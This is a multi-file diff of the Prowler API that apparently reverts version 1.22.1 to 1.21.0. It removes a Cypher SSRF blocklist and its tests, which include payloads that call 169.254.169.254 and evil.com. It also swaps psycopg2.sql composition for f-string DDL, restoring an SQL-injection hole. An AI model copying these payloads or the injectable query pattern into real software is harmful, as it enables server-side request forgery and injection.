-| Dropping or reindexing PostgreSQL indexes | `postgresql-indexing` |
 | Fixing bug | `tdd` |
 | Implementing JSON:API endpoints | `django-drf` |
 | Implementing feature | `tdd` |
@@ -40,14 +32,12 @@ When performing these actions, ALWAYS invoke the corresponding skill FIRST:
 | Refactoring code | `tdd` |
 | Review changelog format and conventions | `prowler-changelog` |
 | Reviewing JSON:API compliance | `jsonapi` |
-| Running makemigrations or pgmakemigrations | `django-migration-psql` |
 | Testing RLS tenant isolation | `prowler-test-api` |
 | Update CHANGELOG.md in any component | `prowler-changelog` |
 | Updating existing Attack Paths queries | `prowler-attack-paths-query` |
 | Working on task | `tdd` |
 | Writing Prowler API tests | `prowler-test-api` |
 | Writing Python tests with pytest | `pytest` |
-| Writing data backfill or data migration | `django-migration-psql` |

 ---

@@ -2,47 +2,20 @@

 All notable changes to the **Prowler API** are documented in this file.

-## [1.22.1] (Prowler v5.21.1)
-
-### 🐞 Fixed
-
- ThreatScore aggregation query to eliminate unnecessary JOINs and `COUNT(DISTINCT)` overhead [(#10394)](https://github.com/prowler-cloud/prowler/pull/10394)
-
---
-
-## [1.22.0] (Prowler v5.21.0)
-
-### 🚀 Added
-
- `CORS_ALLOWED_ORIGINS` configurable via environment variable [(#10355)](https://github.com/prowler-cloud/prowler/pull/10355)
- Attack Paths: Tenant and provider related labels to the nodes so they can be easily filtered on custom queries [(#10308)](https://github.com/prowler-cloud/prowler/pull/10308)
-
-### 🔄 Changed
-
- Attack Paths: Complete migration to private graph labels and properties, removing deprecated dual-write support [(#10268)](https://github.com/prowler-cloud/prowler/pull/10268)
- Attack Paths: Reduce sync and findings memory usage with smaller batches, cursor iteration, and sequential sessions [(#10359)](https://github.com/prowler-cloud/prowler/pull/10359)
-
-### 🐞 Fixed
-
- Attack Paths: Recover `graph_data_ready` flag when scan fails during graph swap, preventing query endpoints from staying blocked until the next successful scan [(#10354)](https://github.com/prowler-cloud/prowler/pull/10354)
-
-### 🔐 Security
-
- Use `psycopg2.sql` to safely compose DDL in `PostgresEnumMigration`, preventing SQL injection via f-string interpolation [(#10166)](https://github.com/prowler-cloud/prowler/pull/10166)
-
---
-
-## [1.21.0] (Prowler v5.20.0)
+## [1.21.0] (Prowler UNRELEASED)

 ### 🔄 Changed

 - Attack Paths: Migrate network exposure queries from APOC to standard openCypher for Neo4j and Neptune compatibility [(#10266)](https://github.com/prowler-cloud/prowler/pull/10266)
 - `POST /api/v1/providers` returns `409 Conflict` if already exists [(#10293)](https://github.com/prowler-cloud/prowler/pull/10293)

+---
+
+## [1.20.1] (Prowler UNRELEASED)
+
 ### 🐞 Fixed

- Attack Paths: Security hardening for custom query endpoint (Cypher blocklist, input validation, rate limiting, Helm lockdown) [(#10238)](https://github.com/prowler-cloud/prowler/pull/10238)
- Attack Paths: Missing logging for query execution and exception details in scan error handling [(#10269)](https://github.com/prowler-cloud/prowler/pull/10269)
+- Attack Paths: Add missing logging for query execution and exception details in scan error handling [(#10269)](https://github.com/prowler-cloud/prowler/pull/10269)
 - Attack Paths: Upgrade Cartography from 0.129.0 to 0.132.0, fixing `exposed_internet` not set on ELB/ELBv2 nodes [(#10272)](https://github.com/prowler-cloud/prowler/pull/10272)

 ---
@@ -24,7 +24,7 @@ dependencies = [
  "drf-spectacular-jsonapi==0.5.1",
  "gunicorn==23.0.0",
  "lxml==5.3.2",
-  "prowler @ git+https://github.com/prowler-cloud/prowler.git@v5.21",
+  "prowler @ git+https://github.com/prowler-cloud/prowler.git@master",
  "psycopg2-binary==2.9.9",
  "pytest-celery[redis] (>=1.0.1,<2.0.0)",
  "sentry-sdk[django] (>=2.20.0,<3.0.0)",
@@ -49,7 +49,7 @@ name = "prowler-api"
 package-mode = false
 # Needed for the SDK compatibility
 requires-python = ">=3.11,<3.13"
-version = "1.22.1"
+version = "1.21.0"

 [project.scripts]
 celery = "src.backend.config.settings.celery"
@@ -1,21 +1,24 @@
 import atexit
 import logging
 import threading
+
+from typing import Any
+
 from contextlib import contextmanager
-from typing import Any, Iterator
+from typing import Iterator
 from uuid import UUID

 import neo4j
 import neo4j.exceptions
-from config.env import env
+
 from django.conf import settings
-from tasks.jobs.attack_paths.config import (
-    BATCH_SIZE,
-    PROVIDER_ID_PROPERTY,
-    PROVIDER_RESOURCE_LABEL,
-)

 from api.attack_paths.retryable_session import RetryableSession
+from config.env import env
+from tasks.jobs.attack_paths.config import (
+    BATCH_SIZE,
+    DEPRECATED_PROVIDER_RESOURCE_LABEL,
+)

 # Without this Celery goes crazy with Neo4j logging
 logging.getLogger("neo4j").setLevel(logging.ERROR)
@@ -32,7 +35,6 @@ READ_EXCEPTION_CODES = [
    "Neo.ClientError.Statement.AccessMode",
    "Neo.ClientError.Procedure.ProcedureNotFound",
 ]
-CLIENT_STATEMENT_EXCEPTION_PREFIX = "Neo.ClientError.Statement."

 # Module-level process-wide driver singleton
 _driver: neo4j.Driver | None = None
@@ -106,7 +108,6 @@ def get_session(
    except neo4j.exceptions.Neo4jError as exc:
        if (
            default_access_mode == neo4j.READ_ACCESS
-            and exc.code
            and exc.code in READ_EXCEPTION_CODES
        ):
            message = "Read query not allowed"
@@ -114,10 +115,6 @@ def get_session(
            raise WriteQueryNotAllowedException(message=message, code=code)

        message = exc.message if exc.message is not None else str(exc)
-
-        if exc.code and exc.code.startswith(CLIENT_STATEMENT_EXCEPTION_PREFIX):
-            raise ClientStatementException(message=message, code=exc.code)
-
        raise GraphDatabaseQueryException(message=message, code=exc.code)

    finally:
@@ -175,7 +172,7 @@ def drop_subgraph(database: str, provider_id: str) -> int:
            while deleted_count > 0:
                result = session.run(
                    f"""
-                    MATCH (n:{PROVIDER_RESOURCE_LABEL} {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+                    MATCH (n:{DEPRECATED_PROVIDER_RESOURCE_LABEL} {{provider_id: $provider_id}})
                    WITH n LIMIT $batch_size
                    DETACH DELETE n
                    RETURN COUNT(n) AS deleted_nodes_count
@@ -193,29 +190,6 @@ def drop_subgraph(database: str, provider_id: str) -> int:
    return deleted_nodes


-def has_provider_data(database: str, provider_id: str) -> bool:
-    """
-    Check if any ProviderResource node exists for this provider.
-
-    Returns `False` if the database doesn't exist.
-    """
-    query = (
-        f"MATCH (n:{PROVIDER_RESOURCE_LABEL} "
-        f"{{{PROVIDER_ID_PROPERTY}: $provider_id}}) "
-        "RETURN 1 LIMIT 1"
-    )
-
-    try:
-        with get_session(database, default_access_mode=neo4j.READ_ACCESS) as session:
-            result = session.run(query, {"provider_id": provider_id})
-            return result.single() is not None
-
-    except GraphDatabaseQueryException as exc:
-        if exc.code == "Neo.ClientError.Database.DatabaseNotFound":
-            return False
-        raise
-
-
 def clear_cache(database: str) -> None:
    query = "CALL db.clearQueryCaches()"

@@ -253,7 +227,3 @@ class GraphDatabaseQueryException(Exception):

 class WriteQueryNotAllowedException(GraphDatabaseQueryException):
    pass
-
-
-class ClientStatementException(GraphDatabaseQueryException):
-    pass
@@ -3,7 +3,7 @@ from api.attack_paths.queries.types import (
    AttackPathsQueryDefinition,
    AttackPathsQueryParameterDefinition,
 )
-from tasks.jobs.attack_paths.config import PROVIDER_ID_PROPERTY, PROWLER_FINDING_LABEL
+from tasks.jobs.attack_paths.config import PROWLER_FINDING_LABEL


 # Custom Attack Path Queries
@@ -16,7 +16,7 @@ AWS_INTERNET_EXPOSED_EC2_SENSITIVE_S3_ACCESS = AttackPathsQueryDefinition(
    description="Detect EC2 instances with SSH exposed to the internet that can assume higher-privileged roles to read tagged sensitive S3 buckets despite bucket-level public access blocks.",
    provider="aws",
    cypher=f"""
-        OPTIONAL MATCH (internet:Internet {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+        OPTIONAL MATCH (internet:Internet {{_provider_id: $provider_id}})

        MATCH path_s3 = (aws:AWSAccount {{id: $provider_uid}})--(s3:S3Bucket)--(t:AWSTag)
        WHERE toLower(t.key) = toLower($tag_key) AND toLower(t.value) = toLower($tag_value)
@@ -179,7 +179,7 @@ AWS_EC2_INSTANCES_INTERNET_EXPOSED = AttackPathsQueryDefinition(
    description="Find EC2 instances flagged as exposed to the internet within the selected account.",
    provider="aws",
    cypher=f"""
-        OPTIONAL MATCH (internet:Internet {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+        OPTIONAL MATCH (internet:Internet {{_provider_id: $provider_id}})

        MATCH path = (aws:AWSAccount {{id: $provider_uid}})--(ec2:EC2Instance)
        WHERE ec2.exposed_internet = true
@@ -201,7 +201,7 @@ AWS_SECURITY_GROUPS_OPEN_INTERNET_FACING = AttackPathsQueryDefinition(
    description="Find internet-facing resources associated with security groups that allow inbound access from '0.0.0.0/0'.",
    provider="aws",
    cypher=f"""
-        OPTIONAL MATCH (internet:Internet {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+        OPTIONAL MATCH (internet:Internet {{_provider_id: $provider_id}})

        // Match EC2 instances that are internet-exposed with open security groups (0.0.0.0/0)
        MATCH path_ec2 = (aws:AWSAccount {{id: $provider_uid}})--(ec2:EC2Instance)--(sg:EC2SecurityGroup)--(ipi:IpPermissionInbound)--(ir:IpRange)
@@ -225,7 +225,7 @@ AWS_CLASSIC_ELB_INTERNET_EXPOSED = AttackPathsQueryDefinition(
    description="Find Classic Load Balancers exposed to the internet along with their listeners.",
    provider="aws",
    cypher=f"""
-        OPTIONAL MATCH (internet:Internet {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+        OPTIONAL MATCH (internet:Internet {{_provider_id: $provider_id}})

        MATCH path = (aws:AWSAccount {{id: $provider_uid}})--(elb:LoadBalancer)--(listener:ELBListener)
        WHERE elb.exposed_internet = true
@@ -247,7 +247,7 @@ AWS_ELBV2_INTERNET_EXPOSED = AttackPathsQueryDefinition(
    description="Find ELBv2 load balancers exposed to the internet along with their listeners.",
    provider="aws",
    cypher=f"""
-        OPTIONAL MATCH (internet:Internet {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+        OPTIONAL MATCH (internet:Internet {{_provider_id: $provider_id}})

        MATCH path = (aws:AWSAccount {{id: $provider_uid}})--(elbv2:LoadBalancerV2)--(listener:ELBV2Listener)
        WHERE elbv2.exposed_internet = true
@@ -269,7 +269,7 @@ AWS_PUBLIC_IP_RESOURCE_LOOKUP = AttackPathsQueryDefinition(
    description="Given a public IP address, find the related AWS resource and its adjacent node within the selected account.",
    provider="aws",
    cypher=f"""
-        OPTIONAL MATCH (internet:Internet {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+        OPTIONAL MATCH (internet:Internet {{_provider_id: $provider_id}})

        MATCH path = (aws:AWSAccount {{id: $provider_uid}})-[r]-(x)-[q]-(y)
        WHERE (x:EC2PrivateIp AND x.public_ip = $ip)
@@ -1,7 +1,7 @@
-from tasks.jobs.attack_paths.config import PROVIDER_ID_PROPERTY, PROVIDER_RESOURCE_LABEL
+from tasks.jobs.attack_paths.config import DEPRECATED_PROVIDER_RESOURCE_LABEL

 CARTOGRAPHY_SCHEMA_METADATA = f"""
-    MATCH (n:{PROVIDER_RESOURCE_LABEL} {{{PROVIDER_ID_PROPERTY}: $provider_id}})
+    MATCH (n:{DEPRECATED_PROVIDER_RESOURCE_LABEL} {{provider_id: $provider_id}})
    WHERE n._module_name STARTS WITH 'cartography:'
      AND NOT n._module_name IN ['cartography:ontology', 'cartography:prowler']
      AND n._module_version IS NOT NULL
@@ -1,5 +1,4 @@
 import logging
-import re

 from typing import Any, Iterable

@@ -13,12 +12,7 @@ from api.attack_paths.queries.schema import (
    RAW_SCHEMA_URL,
 )
 from config.custom_logging import BackendLogger
-from tasks.jobs.attack_paths.config import (
-    INTERNAL_LABELS,
-    INTERNAL_PROPERTIES,
-    PROVIDER_ID_PROPERTY,
-    is_dynamic_isolation_label,
-)
+from tasks.jobs.attack_paths.config import INTERNAL_LABELS, INTERNAL_PROPERTIES

 logger = logging.getLogger(BackendLogger.API)

@@ -123,38 +117,6 @@ def execute_query(

 # Custom query helpers

-# Patterns that indicate SSRF or dangerous procedure calls
-# Defense-in-depth layer - the primary control is `neo4j.READ_ACCESS`
-_BLOCKED_PATTERNS = [
-    re.compile(r"\bLOAD\s+CSV\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.load\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.import\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.export\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.cypher\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.systemdb\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.config\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.periodic\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.do\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.trigger\b", re.IGNORECASE),
-    re.compile(r"\bapoc\.custom\b", re.IGNORECASE),
-]
-
-# Strip string literals so patterns inside quotes don't cause false positives
-# Handles escaped quotes (\' and \") inside strings
-_STRING_LITERALS = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")
-
-
-def validate_custom_query(cypher: str) -> None:
-    """Reject queries containing known SSRF or dangerous procedure patterns.
-
-    Raises ValidationError if a blocked pattern is found.
-    String literals are stripped before matching to avoid false positives.
-    """
-    stripped = _STRING_LITERALS.sub("", cypher)
-    for pattern in _BLOCKED_PATTERNS:
-        if pattern.search(stripped):
-            raise ValidationError({"query": "Query contains a blocked operation"})
-

 def normalize_custom_query_payload(raw_data):
    if not isinstance(raw_data, dict):
@@ -173,8 +135,6 @@ def execute_custom_query(
    cypher: str,
    provider_id: str,
 ) -> dict[str, Any]:
-    validate_custom_query(cypher)
-
    try:
        graph = graph_database.execute_read_query(
            database=database_name,
@@ -183,9 +143,6 @@ def execute_custom_query(
        serialized = _serialize_graph(graph, provider_id)
        return _truncate_graph(serialized)

-    except graph_database.ClientStatementException as exc:
-        raise ValidationError({"query": exc.message})
-
    except graph_database.WriteQueryNotAllowedException:
        raise PermissionDenied(
            "Attack Paths query execution failed: read-only queries are enforced"
@@ -258,7 +215,7 @@ def _serialize_graph(graph, provider_id: str) -> dict[str, Any]:
    nodes = []
    kept_node_ids = set()
    for node in graph.nodes:
-        if node._properties.get(PROVIDER_ID_PROPERTY) != provider_id:
+        if node._properties.get("provider_id") != provider_id:
            continue

        kept_node_ids.add(node.element_id)
@@ -270,15 +227,9 @@ def _serialize_graph(graph, provider_id: str) -> dict[str, Any]:
            },
        )

-    filtered_count = len(graph.nodes) - len(nodes)
-    if filtered_count > 0:
-        logger.debug(
-            f"Filtered {filtered_count} nodes without matching provider_id={provider_id}"
-        )
-
    relationships = []
    for relationship in graph.relationships:
-        if relationship._properties.get(PROVIDER_ID_PROPERTY) != provider_id:
+        if relationship._properties.get("provider_id") != provider_id:
            continue

        if (
@@ -306,11 +257,7 @@ def _serialize_graph(graph, provider_id: str) -> dict[str, Any]:


 def _filter_labels(labels: Iterable[str]) -> list[str]:
-    return [
-        label
-        for label in labels
-        if label not in INTERNAL_LABELS and not is_dynamic_isolation_label(label)
-    ]
+    return [label for label in labels if label not in INTERNAL_LABELS]


 def _serialize_properties(properties: dict[str, Any]) -> dict[str, Any]:
@@ -18,7 +18,6 @@ from django.db import (
 )
 from django_celery_beat.models import PeriodicTask
 from psycopg2 import connect as psycopg2_connect
-from psycopg2 import sql as psycopg2_sql
 from psycopg2.extensions import AsIs, new_type, register_adapter, register_type
 from rest_framework_json_api.serializers import ValidationError

@@ -281,23 +280,15 @@ class PostgresEnumMigration:
        self.enum_values = enum_values

    def create_enum_type(self, apps, schema_editor):  # noqa: F841
+        string_enum_values = ", ".join([f"'{value}'" for value in self.enum_values])
        with schema_editor.connection.cursor() as cursor:
            cursor.execute(
-                psycopg2_sql.SQL("CREATE TYPE {} AS ENUM ({})").format(
-                    psycopg2_sql.Identifier(self.enum_name),
-                    psycopg2_sql.SQL(", ").join(
-                        psycopg2_sql.Literal(v) for v in self.enum_values
-                    ),
-                )
+                f"CREATE TYPE {self.enum_name} AS ENUM ({string_enum_values});"
            )

    def drop_enum_type(self, apps, schema_editor):  # noqa: F841
        with schema_editor.connection.cursor() as cursor:
-            cursor.execute(
-                psycopg2_sql.SQL("DROP TYPE {}").format(
-                    psycopg2_sql.Identifier(self.enum_name)
-                )
-            )
+            cursor.execute(f"DROP TYPE {self.enum_name};")


 class PostgresEnumField(models.Field):
@@ -1,7 +1,7 @@
 openapi: 3.0.3
 info:
  title: Prowler API
-  version: 1.22.1
+  version: 1.21.0
  description: |-
    Prowler API specification.

@@ -9,10 +9,6 @@ from rest_framework.exceptions import APIException, PermissionDenied, Validation

 from api.attack_paths import database as graph_database
 from api.attack_paths import views_helpers
-from tasks.jobs.attack_paths.config import (
-    PROVIDER_ELEMENT_ID_PROPERTY,
-    PROVIDER_ID_PROPERTY,
-)


 def _make_neo4j_error(message, code):
@@ -112,7 +108,7 @@ def test_execute_query_serializes_graph(
        labels=["AWSAccount"],
        properties={
            "name": "account",
-            PROVIDER_ID_PROPERTY: provider_id,
+            "provider_id": provider_id,
            "complex": {
                "items": [
                    attack_paths_graph_stub_classes.NativeValue("value"),
@@ -122,14 +118,14 @@ def test_execute_query_serializes_graph(
        },
    )
    node_2 = attack_paths_graph_stub_classes.Node(
-        "node-2", ["RDSInstance"], {PROVIDER_ID_PROPERTY: provider_id}
+        "node-2", ["RDSInstance"], {"provider_id": provider_id}
    )
    relationship = attack_paths_graph_stub_classes.Relationship(
        element_id="rel-1",
        rel_type="OWNS",
        start_node=node,
        end_node=node_2,
-        properties={"weight": 1, PROVIDER_ID_PROPERTY: provider_id},
+        properties={"weight": 1, "provider_id": provider_id},
    )
    graph = SimpleNamespace(nodes=[node, node_2], relationships=[relationship])

@@ -217,20 +213,20 @@ def test_serialize_graph_filters_by_provider_id(attack_paths_graph_stub_classes)
    provider_id = "provider-keep"

    node_keep = attack_paths_graph_stub_classes.Node(
-        "n1", ["AWSAccount"], {PROVIDER_ID_PROPERTY: provider_id}
+        "n1", ["AWSAccount"], {"provider_id": provider_id}
    )
    node_drop = attack_paths_graph_stub_classes.Node(
-        "n2", ["AWSAccount"], {PROVIDER_ID_PROPERTY: "provider-other"}
+        "n2", ["AWSAccount"], {"provider_id": "provider-other"}
    )

    rel_keep = attack_paths_graph_stub_classes.Relationship(
-        "r1", "OWNS", node_keep, node_keep, {PROVIDER_ID_PROPERTY: provider_id}
+        "r1", "OWNS", node_keep, node_keep, {"provider_id": provider_id}
    )
    rel_drop_by_provider = attack_paths_graph_stub_classes.Relationship(
-        "r2", "OWNS", node_keep, node_drop, {PROVIDER_ID_PROPERTY: "provider-other"}
+        "r2", "OWNS", node_keep, node_drop, {"provider_id": "provider-other"}
    )
    rel_drop_orphaned = attack_paths_graph_stub_classes.Relationship(
-        "r3", "OWNS", node_keep, node_drop, {PROVIDER_ID_PROPERTY: provider_id}
+        "r3", "OWNS", node_keep, node_drop, {"provider_id": provider_id}
    )

    graph = SimpleNamespace(
@@ -354,8 +350,10 @@ def test_serialize_properties_filters_internal_fields():
        "_module_name": "cartography:aws",
        "_module_version": "0.98.0",
        # Provider isolation
-        PROVIDER_ID_PROPERTY: "42",
-        PROVIDER_ELEMENT_ID_PROPERTY: "42:abc123",
+        "_provider_id": "42",
+        "_provider_element_id": "42:abc123",
+        "provider_id": "42",
+        "provider_element_id": "42:abc123",
    }

    result = views_helpers._serialize_properties(properties)
@@ -363,14 +361,6 @@ def test_serialize_properties_filters_internal_fields():
    assert result == {"name": "prod"}


-def test_filter_labels_strips_dynamic_isolation_labels():
-    labels = ["AWSRole", "_Tenant_abc123", "_Provider_def456", "_ProviderResource"]
-
-    result = views_helpers._filter_labels(labels)
-
-    assert result == ["AWSRole"]
-
-
 def test_serialize_graph_as_text_node_without_properties():
    graph = {
        "nodes": [{"id": "n1", "labels": ["AWSAccount"], "properties": {}}],
@@ -450,13 +440,13 @@ def test_execute_custom_query_serializes_graph(
 ):
    provider_id = "test-provider-123"
    node_1 = attack_paths_graph_stub_classes.Node(
-        "node-1", ["AWSAccount"], {PROVIDER_ID_PROPERTY: provider_id}
+        "node-1", ["AWSAccount"], {"provider_id": provider_id}
    )
    node_2 = attack_paths_graph_stub_classes.Node(
-        "node-2", ["RDSInstance"], {PROVIDER_ID_PROPERTY: provider_id}
+        "node-2", ["RDSInstance"], {"provider_id": provider_id}
    )
    relationship = attack_paths_graph_stub_classes.Relationship(
-        "rel-1", "OWNS", node_1, node_2, {PROVIDER_ID_PROPERTY: provider_id}
+        "rel-1", "OWNS", node_1, node_2, {"provider_id": provider_id}
    )

    graph_result = MagicMock()
@@ -511,72 +501,6 @@ def test_execute_custom_query_wraps_graph_errors():
    mock_logger.error.assert_called_once()


-# -- validate_custom_query ------------------------------------------------
-
-
-@pytest.mark.parametrize(
-    "cypher",
-    [
-        "LOAD CSV FROM 'http://169.254.169.254/' AS x RETURN x",
-        "load csv from 'http://evil.com' as row return row",
-        "CALL apoc.load.json('http://evil.com/') YIELD value RETURN value",
-        "CALL apoc.load.csvParams('http://evil.com/', {}, null) YIELD list RETURN list",
-        "CALL apoc.import.csv([{fileName: 'f'}], [], {}) YIELD node RETURN node",
-        "CALL apoc.export.csv.all('file.csv', {})",
-        "CALL apoc.cypher.run('CREATE (n)', {}) YIELD value RETURN value",
-        "CALL apoc.systemdb.graph() YIELD nodes RETURN nodes",
-        "CALL apoc.config.list() YIELD key, value RETURN key, value",
-        "CALL apoc.periodic.iterate('MATCH (n) RETURN n', 'DELETE n', {batchSize: 100})",
-        "CALL apoc.do.when(true, 'CREATE (n) RETURN n', '', {}) YIELD value RETURN value",
-        "CALL apoc.trigger.add('t', 'RETURN 1', {phase: 'before'})",
-        "CALL apoc.custom.asProcedure('myProc', 'RETURN 1')",
-    ],
-    ids=[
-        "LOAD_CSV",
-        "LOAD_CSV_lowercase",
-        "apoc.load.json",
-        "apoc.load.csvParams",
-        "apoc.import.csv",
-        "apoc.export.csv",
-        "apoc.cypher.run",
-        "apoc.systemdb.graph",
-        "apoc.config.list",
-        "apoc.periodic.iterate",
-        "apoc.do.when",
-        "apoc.trigger.add",
-        "apoc.custom.asProcedure",
-    ],
-)
-def test_validate_custom_query_rejects_blocked_patterns(cypher):
-    with pytest.raises(ValidationError) as exc:
-        views_helpers.validate_custom_query(cypher)
-
-    assert "blocked operation" in str(exc.value.detail)
-
-
-@pytest.mark.parametrize(
-    "cypher",
-    [
-        "MATCH (n:AWSAccount) RETURN n LIMIT 10",
-        "MATCH (a)-[r]->(b) RETURN a, r, b",
-        "MATCH (n) WHERE n.name CONTAINS 'load' RETURN n",
-        "CALL apoc.create.vNode(['Label'], {}) YIELD node RETURN node",
-        "MATCH (n) WHERE n.name = 'apoc.load.json' RETURN n",
-        'MATCH (n) WHERE n.description = "LOAD CSV is cool" RETURN n',
-    ],
-    ids=[
-        "simple_match",
-        "traversal",
-        "contains_load_substring",
-        "apoc_virtual_node",
-        "apoc_load_inside_single_quotes",
-        "load_csv_inside_double_quotes",
-    ],
-)
-def test_validate_custom_query_allows_clean_queries(cypher):
-    views_helpers.validate_custom_query(cypher)
-
-
 # -- _truncate_graph ----------------------------------------------------------


@@ -442,78 +442,3 @@ class TestThreadSafety:
        # All threads got the same driver instance
        assert all(r is mock_driver for r in results)
        assert len(results) == 10
-
-
-class TestHasProviderData:
-    """Test has_provider_data helper for checking provider nodes in Neo4j."""
-
-    def test_returns_true_when_nodes_exist(self):
-        import api.attack_paths.database as db_module
-
-        mock_session = MagicMock()
-        mock_result = MagicMock()
-        mock_result.single.return_value = MagicMock()  # non-None record
-        mock_session.run.return_value = mock_result
-
-        session_ctx = MagicMock()
-        session_ctx.__enter__.return_value = mock_session
-        session_ctx.__exit__.return_value = False
-
-        with patch(
-            "api.attack_paths.database.get_session",
-            return_value=session_ctx,
-        ):
-            assert db_module.has_provider_data("db-tenant-abc", "provider-123") is True
-
-        mock_session.run.assert_called_once()
-
-    def test_returns_false_when_no_nodes(self):
-        import api.attack_paths.database as db_module
-
-        mock_session = MagicMock()
-        mock_result = MagicMock()
-        mock_result.single.return_value = None
-        mock_session.run.return_value = mock_result
-
-        session_ctx = MagicMock()
-        session_ctx.__enter__.return_value = mock_session
-        session_ctx.__exit__.return_value = False
-
-        with patch(
-            "api.attack_paths.database.get_session",
-            return_value=session_ctx,
-        ):
-            assert db_module.has_provider_data("db-tenant-abc", "provider-123") is False
-
-    def test_returns_false_when_database_not_found(self):
-        import api.attack_paths.database as db_module
-
-        session_ctx = MagicMock()
-        session_ctx.__enter__.side_effect = db_module.GraphDatabaseQueryException(
-            message="Database does not exist",
-            code="Neo.ClientError.Database.DatabaseNotFound",
-        )
-
-        with patch(
-            "api.attack_paths.database.get_session",
-            return_value=session_ctx,
-        ):
-            assert (
-                db_module.has_provider_data("db-tenant-gone", "provider-123") is False
-            )
-
-    def test_raises_on_other_errors(self):
-        import api.attack_paths.database as db_module
-
-        session_ctx = MagicMock()
-        session_ctx.__enter__.side_effect = db_module.GraphDatabaseQueryException(
-            message="Connection refused",
-            code="Neo.TransientError.General.UnknownError",
-        )
-
-        with patch(
-            "api.attack_paths.database.get_session",
-            return_value=session_ctx,
-        ):
-            with pytest.raises(db_module.GraphDatabaseQueryException):
-                db_module.has_provider_data("db-tenant-abc", "provider-123")
@@ -6,12 +6,10 @@ import pytest
 from django.conf import settings
 from django.db import DEFAULT_DB_ALIAS, OperationalError
 from freezegun import freeze_time
-from psycopg2 import sql as psycopg2_sql
 from rest_framework_json_api.serializers import ValidationError

 from api.db_utils import (
    POSTGRES_TENANT_VAR,
-    PostgresEnumMigration,
    _should_create_index_on_partition,
    batch_delete,
    create_objects_in_batches,
@@ -912,61 +910,3 @@ class TestRlsTransaction:
            cursor.execute("SELECT 1")
            result = cursor.fetchone()
            assert result[0] == 1
-
-
-class TestPostgresEnumMigration:
-    """
-    Verify that PostgresEnumMigration builds DDL statements via psycopg2.sql
-    so that enum type names and values are always properly quoted — preventing
-    SQL injection through f-string interpolation.
-    """
-
-    def _make_mock_schema_editor(self):
-        mock_cursor = MagicMock()
-        mock_conn = MagicMock()
-        mock_conn.cursor.return_value.__enter__ = MagicMock(return_value=mock_cursor)
-        mock_conn.cursor.return_value.__exit__ = MagicMock(return_value=False)
-        mock_schema_editor = MagicMock()
-        mock_schema_editor.connection = mock_conn
-        return mock_schema_editor, mock_cursor
-
-    def test_create_enum_type_generates_correct_sql(self):
-        """create_enum_type builds a proper CREATE TYPE … AS ENUM via psycopg2.sql."""
-        migration = PostgresEnumMigration("my_enum", ("val_a", "val_b"))
-        schema_editor, mock_cursor = self._make_mock_schema_editor()
-
-        migration.create_enum_type(apps=None, schema_editor=schema_editor)
-
-        mock_cursor.execute.assert_called_once()
-        query_arg = mock_cursor.execute.call_args[0][0]
-        assert isinstance(
-            query_arg, psycopg2_sql.Composable
-        ), "create_enum_type must pass a psycopg2.sql.Composable, not a raw string."
-        # Verify the composed SQL structure: CREATE TYPE <Identifier> AS ENUM (<Literals>)
-        parts = query_arg.seq
-        assert parts[0] == psycopg2_sql.SQL("CREATE TYPE ")
-        assert isinstance(parts[1], psycopg2_sql.Identifier)
-        assert parts[1].strings == ("my_enum",)
-        assert parts[2] == psycopg2_sql.SQL(" AS ENUM (")
-        # The enum values are a Composed of Literal items joined by ", "
-        enum_literals = [p for p in parts[3].seq if isinstance(p, psycopg2_sql.Literal)]
-        assert [lit._wrapped for lit in enum_literals] == ["val_a", "val_b"]
-        assert parts[4] == psycopg2_sql.SQL(")")
-
-    def test_drop_enum_type_generates_correct_sql(self):
-        """drop_enum_type builds a proper DROP TYPE via psycopg2.sql."""
-        migration = PostgresEnumMigration("my_enum", ("val_a",))
-        schema_editor, mock_cursor = self._make_mock_schema_editor()
-
-        migration.drop_enum_type(apps=None, schema_editor=schema_editor)
-
-        mock_cursor.execute.assert_called_once()
-        query_arg = mock_cursor.execute.call_args[0][0]
-        assert isinstance(
-            query_arg, psycopg2_sql.Composable
-        ), "drop_enum_type must pass a psycopg2.sql.Composable, not a raw string."
-        # Verify the composed SQL structure: DROP TYPE <Identifier>
-        parts = query_arg.seq
-        assert parts[0] == psycopg2_sql.SQL("DROP TYPE ")
-        assert isinstance(parts[1], psycopg2_sql.Identifier)
-        assert parts[1].strings == ("my_enum",)
@@ -3810,12 +3810,6 @@ class TestTaskViewSet:

@pytest.mark.django_db
 class TestAttackPathsScanViewSet:
-    @pytest.fixture(autouse=True)
-    def _clear_throttle_cache(self):
-        from django.core.cache import cache
-
-        cache.clear()
-
    @staticmethod
    def _run_payload(query_id="aws-rds", parameters=None):
        return {
@@ -4417,6 +4411,8 @@ class TestAttackPathsScanViewSet:
            }
        }

+    # TODO: Remove skip once queries/custom and schema endpoints are unblocked
+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_run_custom_query_returns_graph(
        self,
        authenticated_client,
@@ -4474,6 +4470,7 @@ class TestAttackPathsScanViewSet:
        assert attributes["total_nodes"] == 1
        assert attributes["truncated"] is False

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_run_custom_query_returns_text_when_accept_text_plain(
        self,
        authenticated_client,
@@ -4528,6 +4525,7 @@ class TestAttackPathsScanViewSet:
        assert "## Relationships (0)" in body
        assert "## Summary" in body

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_run_custom_query_returns_404_when_no_nodes(
        self,
        authenticated_client,
@@ -4569,6 +4567,7 @@ class TestAttackPathsScanViewSet:

        assert response.status_code == status.HTTP_404_NOT_FOUND

+    @pytest.mark.skip(reason="Endpoint temporarily blocked")
    def test_run_custom_query_returns_400_when_graph_not_ready(
        self,
        authenticated_client,
@@ -4595,6 +4594,7 @@ class TestAttackPathsScanViewSet:
